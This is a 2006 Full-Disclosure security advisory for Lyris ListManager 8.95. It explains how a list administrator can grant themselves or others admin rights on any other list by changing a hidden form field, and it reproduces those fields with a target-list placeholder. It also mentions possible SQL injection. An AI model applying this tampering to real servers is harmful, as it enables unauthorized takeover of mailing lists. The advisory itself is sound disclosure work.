Advisory: Lyris ListManager 8.95: Add arbitrary administrator to arbitrary list
Release Date: 2006-08-30
Application: Lyris ListManager 8.95
Risk: Depends upon your use and business context
Vendor site: http://www.lyris.com/
Overview of Product:
"Lyris ListManager is the world's most popular software for creating,
sending, and tracking highly effective email campaigns, newsletters, and
discussion groups." http://www.lyris.com/products/index.html
Details of this Vulnerability:
A design flaw in ListManager's web-based administrative interface allows
anyone who is an administrator of a list on the server to add an arbitrary user
as an administrator to any other list hosted on the same server. Specifically,
the form one fills out to add an administrator contains a hidden form field
with the name of the list to which the administrator will be added. By
changing this value and submitting the form (using tools like TamperData for
FireFox), you can add an arbitrary user as an administrator for an arbitrary
list.
Here is a sample of these hidden form fields:
<!-- START OF - save cgi variables in hidden fields -->
<input type="hidden" name="MEMBERS_.AppNeeded_" value="F">
<input type="hidden" name="MEMBERS_.CleanAuto_" value="F">
<input type="hidden" name="MEMBERS_.DateJoined_" value="2006-08-30
20:20:32">
<input type="hidden" name="MEMBERS_.EnableWYSIWYG_" value="T">
<input type="hidden" name="MEMBERS_.IsListAdm_" value="T">
<input type="hidden" name="MEMBERS_.List_" value="[INSERT TARGET LIST
HERE]">
<input type="hidden" name="MEMBERS_.MailFormat_" value="M">
<input type="hidden" name="MEMBERS_.MemberType_" value="normal">
<input type="hidden" name="MEMBERS_.NoRepro_" value="F">
<input type="hidden" name="MEMBERS_.NotifySubm_" value="T">
<input type="hidden" name="MEMBERS_.NumAppNeed_" value="0">
<input type="hidden" name="MEMBERS_.RcvAdmMail_" value="T">
<input type="hidden" name="MEMBERS_.ReadsHtml_" value="F">
<input type="hidden" name="MEMBERS_.ReceiveAck_" value="F">
<input type="hidden" name="MEMBERS_.SubType_" value="mail">
<input type="hidden" name="current_tab" value="Basics">
<input type="hidden" name="fields_in_memory" value="FullName_ AppNeeded_
PermissionGroupID_ MemberType_ SubType_ Password_ ExpireDate_ SubType_
CleanAuto_ NoRepro_ UserID_ Comment_ Additional_ ReceiveAck_ NumAppNeed_ List_
DateBounce_ ConfirmDat_ MailFormat_ ReadsHtml_ DateHeld_ DateUnsub_ DateJoined_
UserNameLC_ Domain_ EnableWYSIWYG_ EMAILADDR_ IsListAdm_ RcvAdmMail_
NotifySubm_">
<input type="hidden" name="table_in_memory" value="MEMBERS_">
Further Work:
Yesterday I was trying to add a user whose name contained a single-quote,
e.g. "O'Conner." Frequently, as I navigated the web interface, I received SQL
errors that printed a large portion of the SQL query along with details about
what failed. I'm sure there's SQL injection possibilities here as well, I just
don't have time to explore. And where there are SQL injection opportunities,
there's often opportunities for JavaScript injection.
Recommendations to those using ListManager:
The risk of this issue to your organization is directly tied to how many
administrators you have on your mailing list server, how much you can really
trust them, and the value of your mailing lists. That is, a company that has
five administrators for a public list shouldn't care. However, if you've got a
lot of administrators and a few lists whose discussions would be worth
intercepting or disrupting, you're at high-risk for abuse as a result of this
vulnerability. Until the vendor solves this and other issues, you're going to
have to have a high level of trust in the people administering your lists, or
use a different mailing list server.
Best of luck.
---------------------------------
Want to be your own boss? Learn how on Yahoo! Small Business. _______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
